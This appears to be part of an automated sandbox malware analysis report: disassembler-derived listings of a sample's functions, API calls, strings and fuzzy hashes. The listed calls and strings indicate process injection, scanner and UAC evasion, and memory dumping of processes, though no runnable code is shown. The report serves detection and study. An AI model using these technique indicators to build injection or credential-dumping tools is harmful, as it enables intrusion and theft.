GetThreadContext.KERNEL32(00000000,02EF7424,ScanString,02EF73A8,02E8A938,UacInitialize,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,UacInitialize,02EF73A8), ref: 02E895FE

Part of subcall function 02E87D80: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4

SetThreadContext.KERNEL32(00000000,02EF7424,ScanBuffer,02EF73A8,02E8A938,ScanString,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,00000000,-00000008,02EF74FC,00000004,02EF7500), ref: 02E8A313
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02EF7424,ScanBuffer,02EF73A8,02E8A938,ScanString,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,00000000,-00000008,02EF74FC), ref: 02E8A320

Part of subcall function 02E88954: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,UacScan), ref: 02E88968
Part of subcall function 02E88954: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E88982
Part of subcall function 02E88954: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize), ref: 02E889BE

Strings

MiniDumpReadDumpStream, xrefs: 02E8A724
BCryptRegisterProvider, xrefs: 02E8A597
BCryptQueryProviderRegistration, xrefs: 02E8A583
NtSetSecurityObject, xrefs: 02E8A88B
ntdll, xrefs: 02E8A621, 02E8A635, 02E8A6ED, 02E8A890, 02E8A8A4
UacScan, xrefs: 02E88E6F, 02E89087, 02E89683, 02E89A7F, 02E89BF3, 02E8A39D, 02E8A835
UacInitialize, xrefs: 02E8902E, 02E8938F, 02E8950E, 02E89612, 02E89A0E, 02E89B82, 02E8A32C
advapi32, xrefs: 02E8A701
BCryptVerifySignature, xrefs: 02E8A56F
NtOpenProcess, xrefs: 02E8A89F
NtReadVirtualMemory, xrefs: 02E8A61C
sppc, xrefs: 02E89372
dbgcore, xrefs: 02E8A715, 02E8A729
NtOpenObjectAuditAlarm, xrefs: 02E8A630, 02E8A6E8
MiniDumpWriteDump, xrefs: 02E8A710
bcrypt, xrefs: 02E8A574, 02E8A588, 02E8A59C
ScanString, xrefs: 02E88DFE, 02E88FA9, 02E89157, 02E8957F, 02E89765, 02E898EC, 02E89D79, 02E89F37, 02E8A0A7, 02E8A21A, 02E8A505, 02E8A5B2
ScanBuffer, xrefs: 02E88EC8, 02E88F50, 02E892EB, 02E89400, 02E8949D, 02E897D6, 02E8995D, 02E89AF0, 02E89CD5, 02E89DEA, 02E89FA8, 02E8A118, 02E8A28B, 02E8A47F, 02E8A69D, 02E8A7E3
OpenSession, xrefs: 02E88DA5, 02E891C8, 02E8927A, 02E8A64B, 02E8A791
I_QueryTagInformation, xrefs: 02E8A6FC
SLGetLicenseInformation, xrefs: 02E8935B
Initialize, xrefs: 02E890E6, 02E896F4, 02E8987B, 02E89C64, 02E89EC6, 02E8A036, 02E8A1A9, 02E8A40E, 02E8A73F

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Thread$ContextLibrary$AddressFreeLoadMemoryProcResumeVirtualWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1131989367-51457883
Opcode ID: 989711f765bb074cf78cd11b61c40649ef12515c41f0516f8d9e7fcf5297a5ff
Instruction ID: cb98298cbe1e6934225076218f176bd40553c0b64ac4265c078e70845090736e
Opcode Fuzzy Hash: 989711f765bb074cf78cd11b61c40649ef12515c41f0516f8d9e7fcf5297a5ff
Instruction Fuzzy Hash: D7E2F934AC011D9BDB51FB64EC81ACEB3BAAF95300F51E1E2B14DAB254DA30AE45CF51

Function 02E88D6A Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNEL32(00000000,02EF7424,ScanString,02EF73A8,02E8A938,UacInitialize,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,UacInitialize,02EF73A8), ref: 02E895FE

Strings

MiniDumpReadDumpStream, xrefs: 02E8A724
BCryptRegisterProvider, xrefs: 02E8A597
BCryptQueryProviderRegistration, xrefs: 02E8A583
NtSetSecurityObject, xrefs: 02E8A88B
ntdll, xrefs: 02E8A621, 02E8A635, 02E8A6ED, 02E8A890, 02E8A8A4
UacScan, xrefs: 02E88E6F, 02E89087, 02E89683, 02E89A7F, 02E89BF3, 02E8A39D, 02E8A835
UacInitialize, xrefs: 02E8902E, 02E8938F, 02E8950E, 02E89612, 02E8A32C
advapi32, xrefs: 02E8A701
BCryptVerifySignature, xrefs: 02E8A56F
NtOpenProcess, xrefs: 02E8A89F
NtReadVirtualMemory, xrefs: 02E8A61C
sppc, xrefs: 02E89372
dbgcore, xrefs: 02E8A715, 02E8A729
NtOpenObjectAuditAlarm, xrefs: 02E8A630, 02E8A6E8
MiniDumpWriteDump, xrefs: 02E8A710
bcrypt, xrefs: 02E8A574, 02E8A588, 02E8A59C
ScanString, xrefs: 02E88DFE, 02E88FA9, 02E89157, 02E8957F, 02E89765, 02E898EC, 02E89D79, 02E89F37, 02E8A0A7, 02E8A21A, 02E8A505, 02E8A5B2
ScanBuffer, xrefs: 02E88EC8, 02E88F50, 02E892EB, 02E89400, 02E8949D, 02E897D6, 02E8995D, 02E89AF0, 02E89CD5, 02E89DEA, 02E89FA8, 02E8A118, 02E8A28B, 02E8A47F, 02E8A69D, 02E8A7E3
OpenSession, xrefs: 02E88DA5, 02E891C8, 02E8927A, 02E8A64B, 02E8A791
I_QueryTagInformation, xrefs: 02E8A6FC
SLGetLicenseInformation, xrefs: 02E8935B
Initialize, xrefs: 02E890E6, 02E896F4, 02E8987B, 02E89C64, 02E89EC6, 02E8A036, 02E8A1A9, 02E8A40E, 02E8A73F

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: ContextThread
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1591575202-51457883
Opcode ID: e787e53772895c654bf16f8fc7b607a9d9c449938dd85ad1e5413190d9e639f0
Instruction ID: b5a9a267dc05132839be6a79c4b37e680d6beec0784bb36ea3a7e06e75a00bba
Opcode Fuzzy Hash: e787e53772895c654bf16f8fc7b607a9d9c449938dd85ad1e5413190d9e639f0
Instruction Fuzzy Hash: 4BE2F934AC011D9BDB51FB64EC81ACEB3BAAF95300F51E1E2B14DAB254DA30AE45CF51

Function 02E75908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75925
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02E7593C
lstrcpynA.KERNEL32(?,?,?), ref: 02E7596C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E759D0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A06
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A19
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A2B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000,02E9E790), ref: 02E75A37
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C,02E70000), ref: 02E75A6B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02E76C1C), ref: 02E75A77
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02E75A99

Strings

GetLongPathNameA, xrefs: 02E75933
kernel32.dll, xrefs: 02E75920
\, xrefs: 02E75A49

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: eb8035191f03917e7de70f1d78a4779db21a19fcec04b80de382721dee8847a9
Instruction ID: 25c2658445aad871091bc6184b2158065c5b29457e9b9adfaed2c504acb45407
Opcode Fuzzy Hash: eb8035191f03917e7de70f1d78a4779db21a19fcec04b80de382721dee8847a9
Instruction Fuzzy Hash: E4418071D80259AFDB20DEE8CC88ADEB3BDAF08344F5495A5A958E7241E730DA449F60

Function 02E75BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E75BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E75BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E75BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E75C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E75CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E75CEB

Strings

Software\Borland\Locales, xrefs: 02E75AFC, 02E75B1A
Software\Borland\Delphi\Locales, xrefs: 02E75B38

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction ID: 544fa3d54f0521521b304f5357cf6e3647ce28f5b4a3a8a9cfc5aa8099ecf5eb
Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
Instruction Fuzzy Hash: 0C31C772E8026C2AFB25D6B49C45FDE77AD9B04384F4491A1AA48EA0C0DB749E848F50

Function 02E88954 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize,02EF73A8,02E8A938,UacScan), ref: 02E88968
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E88982
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02EF73A8,02E8A583,ScanString,02EF73A8,02E8A938,ScanBuffer,02EF73A8,02E8A938,Initialize), ref: 02E889BE

Part of subcall function 02E87D80: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4

Strings

bcrypt, xrefs: 02E88967
BCryptVerifySignature, xrefs: 02E8897B

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: f6650bf731a8c45f05f1fabb8de5caad71350df3db0ecce64e07eba343249689
Instruction ID: 2d6ef8be81a7fddac3ece496605b3e9f4a13e8a4c2dec9ea8e47ef88608a5a31
Opcode Fuzzy Hash: f6650bf731a8c45f05f1fabb8de5caad71350df3db0ecce64e07eba343249689
Instruction Fuzzy Hash: 04F0A471AC23147EE390A7AAAC49F56B7BE93C5718F815869FE0C97240E3715C90CB50

Function 02E8DC88 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02E74F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E74F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DD5A), ref: 02E8DCC7
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E8DD01
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E8DD2E
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E8DD37

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 8ff7a9f8ce4b2b9df415899d7657509e4688ffe23dbdb60dc252e3b6099092c7
Instruction ID: 559a55b49f0526e9f9ed9270ecc2b7b43cfe205f5bc8479169496f5f84ac2ab2
Opcode Fuzzy Hash: 8ff7a9f8ce4b2b9df415899d7657509e4688ffe23dbdb60dc252e3b6099092c7
Instruction Fuzzy Hash: 2521F471A80208BAEB11EAE0DD52FDEB7BDDB45B00F509561B644F71C0D7B0BA048B55

Function 02E8DBAC Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 02E8DC28
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DC7A), ref: 02E8DC3E
NtDeleteFile.NTDLL(?), ref: 02E8DC5D

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 93f7b2b271e909228215617636db08154a507f3ac1fed8e051c3ce5cdb52e653
Instruction ID: a9a903bb0f9ee4e2a19e252f9c822f1b4bdd78dd0bd3d8a9a6692ce4fd2ae048
Opcode Fuzzy Hash: 93f7b2b271e909228215617636db08154a507f3ac1fed8e051c3ce5cdb52e653
Instruction Fuzzy Hash: FE016275A84208AEEB05FBB08D51FCD77B9EB45704F519492E288F60C1DB74AB048B25

Function 02E8DC00 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02E74F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E74F2E

RtlInitUnicodeString.NTDLL(?,?), ref: 02E8DC28
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DC7A), ref: 02E8DC3E
NtDeleteFile.NTDLL(?), ref: 02E8DC5D

Part of subcall function 02E74C60: SysFreeString.OLEAUT32(02E8F4A0), ref: 02E74C6E

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: 23fd692a4964962fd6d126341255eab7de5342f03aa90912e77bacc770d38716
Instruction ID: 9ad67640dec3b21707a0ca17dd53dc194b87e55f8c73d1fd3b2c13eba2af229c
Opcode Fuzzy Hash: 23fd692a4964962fd6d126341255eab7de5342f03aa90912e77bacc770d38716
Instruction Fuzzy Hash: D8012C75980208AAEB11EBB0DD52FCDB3BDEB48700F5094A1F608F21C0EA74AB049A64

Function 02E77FDC Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02E77FFD

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 0e84e63113b203bdbb6f4b36e313bd68e2bb40eb0524b8026cc147f5c42d23d8
Instruction ID: 6d17c1e336b220359856ac189eccc39e3490548cb0a17463f6e1f184b7aeedf2
Opcode Fuzzy Hash: 0e84e63113b203bdbb6f4b36e313bd68e2bb40eb0524b8026cc147f5c42d23d8
Instruction Fuzzy Hash: D411DEB5E00209AF9B04CF99CD81DAFF7F9EFC9304B54C569A509E7254E671AA018BA0

Function 02E7A7CC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a15f837c0724dd010505429d36130d73888ad1183ebc3ca2b4af5b62fc2d48f5
Instruction ID: f5df54067dedd2683880c7b585ddcd16146a8331711e88fe3561897da231b6ad
Opcode Fuzzy Hash: a15f837c0724dd010505429d36130d73888ad1183ebc3ca2b4af5b62fc2d48f5
Instruction Fuzzy Hash: 7EE0D872B4021857D315A558AC84EFB725D9758310F00D27ABD04C73C4EEB09D404BE4

Function 02E7B794 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02E9D106,00000000,02E9D11E), ref: 02E7B7A2

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 4d8f96c52c7381e8ea906e6af53b49d6f513d1cd28917fcdacd443f96b912eef
Instruction ID: 05faaf06498215ad2a4bfb24b4b30eb5bb3412b767f528f88a38896f6845aa41
Opcode Fuzzy Hash: 4d8f96c52c7381e8ea906e6af53b49d6f513d1cd28917fcdacd443f96b912eef
Instruction Fuzzy Hash: 8AF0A4749843019FD350DF2AD44261577E9FB48714F889D2BE698C7380E7359895CB53

Function 02E7A818 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02E7BE7A,00000000,02E7C093,?,?,00000000,00000000), ref: 02E7A82B

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
Instruction ID: 9c335bac02b6bba0d372d97a84d2be500cade73aa7ec7f66962b3db37b6b8d0e
Opcode Fuzzy Hash: 037d4bc53f8d63c223699879a68f10b0c110be8fc1968dbb48098bc23aaf63a2
Instruction Fuzzy Hash: B6D05EA234D2602AF210515A2D88DBFAADCCAC57A5F40903AF948C6201D2108C07D6B1

Function 02E79214 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02E79218

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
